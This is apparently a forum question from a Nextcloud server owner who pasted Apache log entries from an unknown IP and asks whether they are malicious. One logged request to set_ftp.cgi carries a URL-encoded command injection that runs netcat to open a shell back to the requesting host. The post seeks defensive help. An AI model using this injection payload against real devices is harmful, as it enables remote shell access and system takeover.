I have a Nextcloud server running on Apache, and disabled my firewall for about 5 minutes while I ran an apt-update. I decided to check the logs after, and found this from an unknown IP. It looks like it is trying to run some sort of script. Does this look like it is malicious or just some web crawler? Thanks!
89.248.166.183 - - [15/Sep/2020:02:06:18 -0400] "GET login.cgi HTTP/1.1" 400 0 "-" "-"
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fs>
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /ftptest.cgi?loginuse=&loginpas= HTTP/1.1\n" 400 0 "-" "-"